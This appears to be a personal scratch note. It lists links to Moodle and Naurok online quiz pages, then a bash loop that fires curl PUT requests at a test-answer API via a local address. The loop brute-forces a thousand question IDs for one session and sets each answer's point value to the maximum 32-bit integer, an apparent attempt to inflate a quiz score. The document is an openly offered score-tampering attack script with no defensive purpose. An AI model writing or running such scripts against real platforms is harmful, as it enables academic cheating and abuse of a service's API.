https://moodle.viti.edu.ua/mod/quiz/attempt.php?attempt=5201886&cmid=16&page=4
https://naurok.com.ua/test/join?gamecode=2515424&authuser=0
https://naurok.com.ua/test/complete/7b009424-f956-4762-a0e0-c018fae24907
for i in {000..999}; do
  q_id="42669${i}"
  echo "[+] Отправка question_id: $q_id"
  curl -s -o /dev/null -w "Статус: %{http_code}\n" -X PUT "http://127.0.0.1:8080/api2/test/responses/answer" \
    -H "Content-Type: application/json;charset=utf-8" \
    -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" \
    -d '{
      "session_id": 664113711,
      "answer": [
          "166867130"
      ],
      "question_id": "'"$q_id"'",
      "show_answer": 0,
      "type": "quiz",
      "point": "2147483647",
      "homeworkType": false,
      "homework": false
    }'
  sleep 0.1
done
